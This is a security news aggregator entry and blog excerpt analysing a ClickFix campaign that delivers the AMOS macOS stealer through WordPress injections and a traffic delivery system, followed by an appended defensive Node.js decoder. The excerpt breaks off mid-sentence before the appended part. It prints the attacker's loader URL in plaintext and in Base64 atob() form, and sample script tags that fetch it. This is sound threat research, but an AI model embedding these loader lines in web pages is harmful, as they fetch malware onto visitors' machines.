Security News

Cybersecurity news aggregator

HIGH Attacks Reddit r/netsec

Uncovering a Global macOS Malware Campaign

A global macOS malware campaign is distributing the AMOS (Atomic macOS Stealer) payload via a social engineering framework called ClickFix, which uses a Traffic Delivery System (TDS) to selectively serve malicious injections on compromised websites like web.hypothes.is to evade standard security scanners. The attack exploits human trust, not a software vulnerability, by presenting fake verification overlays to fingerprinted targets. The article details the attack chain and payload obfuscation but does not provide a CVSS score, specific affected software versions, a fixed version, or a workaround.

The "Ghost" in the Annotations: Uncovering a Global macOS Malware Campaign
Neil Lofland, Feb 27, 2026

Hypothesis is a tool that millions of students, researchers, and educators use every day to annotate the web. It’s the kind of site you’d never think twice about trusting. That’s exactly what makes it such a valuable target.

In the last 48 hours, I identified an active, large-scale malware distribution campaign leveraging a compromised injection on web.hypothes.is and at least five other major websites — including a United Way chapter and a children’s gaming company. The attackers aren’t exploiting a browser zero-day or a novel vulnerability. They’re exploiting something much harder to patch: human trust.

This is a deep dive into the ClickFix social engineering framework and its delivery of AMOS (Atomic macOS Stealer), a sophisticated “Malware-as-a-Service” payload that drains keychains, crypto wallets, and browser credentials. I’ll walk through the full attack chain, show you how to decode the obfuscated payloads yourself, and explain why this campaign is so difficult to detect.

1. The Discovery: Bypassing the TDS “Gate”

Standard security scanners often miss these injections entirely, and that’s by design. The threat actors use a Traffic Delivery System (TDS) — think of it as a hyper-paranoid bouncer standing between the compromised website and the malware payload. A TDS is an intermediary server that decides, in real time, whether to serve malicious content or the clean original site. It makes this decision by fingerprinting every visitor before they even see the page.

The TDS checks the visitor’s IP address against databases of known VPN exit nodes, data center IP ranges, Tor relays, and corporate networks. It inspects the User-Agent string to filter out automated scanners, bots, and non-target operating systems. Some TDS implementations even check screen resolution, browser language, and timezone to build a confidence score.

The result: if you’re a security researcher scanning from an office network, a cloud VM, or behind a VPN, you see the perfectly legitimate website. The injection is invisible. The site owner’s own monitoring tools — also running from data centers — see nothing wrong. VirusTotal’s URL scanner sees nothing wrong. It’s a ghost.

While auditing web.hypothes.is, I noticed a fake Cloudflare “Human Verification” overlay. But when I returned using a different browser in private browsing mode, the overlay was gone. The page was spotless. I tried a VPN IP — same thing: clean. This is the TDS doing its job.

Did I imagine it? Was it a fluke? I didn’t have the initial exchange because you don’t normally sit there with developer tools running. Even if I happened to, sometimes the TDS will detect developer tools as well, using JavaScript to detect when the browser enters a debugging state or when specific UI changes occur. Even if I got past the TDS, I would need something more powerful for the traffic capture.

How I caught it: To get past the gate, I had to look like a real, unsuspecting home user. I switched to a cellular hotspot (which provides a residential IP that won’t appear in any VPN or data center blocklist), spoofed a fresh browser User-Agent, and captured all of the traffic with Zed Attack Proxy (ZAP) for further analysis, being careful not to enable anything that might give away ZAP’s presence, like annotations. Just a clean vanilla install of ZAP driving Firefox in a manual session. Only then did the ghost reappear — the fake Cloudflare modal slid back into view, pixel-perfect and waiting. Now I had everything I needed to peer into the inner workings of this campaign.

2. The Attack Chain: From WordPress to Terminal

The infection is a classic multi-stage delivery designed to bypass browser protections by tricking the user into compromising themselves.

Stage 1: The WordPress Injection

The attacker has successfully compromised the WordPress backend of several high-profile sites — most likely through a vulnerable plugin or stolen admin credentials. Once inside, they don’t modify the theme files directly (which would be easier to spot in a file integrity scan). Instead, they inject a script block into the site’s database, typically through a “Header/Footer Scripts” plugin or a similar custom code injection feature. This means the malicious code is served dynamically from the database on every page load but never exists as a file on disk.

I identified a redundant script loader tucked around line 700 of the landing page HTML. The attacker included the same loader twice — once in plaintext and once obfuscated — as a redundancy measure. If one gets stripped by a WAF or content filter, the other still fires:

Plaintext Gate: https://api.aloparatoriuz.com/LokwiUHhajhWnbX
Obfuscated Gate: atob('aHR0cHM6Ly9hcGkuYWxvcGFyYXRvcml1ei5jb20vTG9rd2lVSGhhamhXbmJY')

Decoding the obfuscation yourself: The atob() function is a built-in browser API that decodes Base64 strings. You can verify what the...
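To do that decoding in bulk rather than one string at a time, here is an added example (not code from the article or the author) for Node.js that pulls every atob('...') literal out of a page's HTML, Base64-decodes it, and flags decoded URLs that also appear in plaintext, which is exactly the redundant-loader pattern described above. The HTML fragment is constructed for this example around the two gate strings quoted in the article.

```javascript
// Added example: find atob() literals in page HTML, decode them, and report
// decoded URLs that are also present in plaintext (the redundant-loader
// pattern). Assumes Node.js for Buffer; not code from the original article.

// Constructed sample modelled on the two gates quoted above: the same loader
// URL once in plaintext and once wrapped in atob().
const SAMPLE_HTML = `
<script src="https://api.aloparatoriuz.com/LokwiUHhajhWnbX"></script>
<script>
  var s = document.createElement('script');
  s.src = atob('aHR0cHM6Ly9hcGkuYWxvcGFyYXRvcml1ei5jb20vTG9rd2lVSGhhamhXbmJY');
  document.head.appendChild(s);
</script>
`;

// atob("...") or atob('...') with a Base64 literal as its only argument.
const ATOB_RE = /atob\(\s*(['"])([A-Za-z0-9+/=]+)\1\s*\)/g;
// Absolute http(s) URLs that appear unobfuscated in the markup.
const URL_RE = /https?:\/\/[^\s"'<>)]+/g;

// Decode every atob() literal in the HTML; returns [{ encoded, decoded }].
function extractAtobLiterals(html) {
  const out = [];
  for (const m of html.matchAll(ATOB_RE)) {
    const encoded = m[2];
    const decoded = Buffer.from(encoded, 'base64').toString('utf8');
    out.push({ encoded, decoded });
  }
  return out;
}

// Decoded atob() values that are URLs and also occur in plaintext elsewhere
// in the same page: one loader stripped by a filter still leaves the other.
function findRedundantLoaders(html) {
  const plain = new Set(html.match(URL_RE) || []);
  return extractAtobLiterals(html)
    .filter(({ decoded }) => /^https?:\/\//.test(decoded) && plain.has(decoded))
    .map(({ decoded }) => decoded);
}

console.log(extractAtobLiterals(SAMPLE_HTML));
console.log(findRedundantLoaders(SAMPLE_HTML));
```

Run it against a saved copy of a landing page captured through the proxy, since the TDS will not serve the injection to a scanner fetching the page directly.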
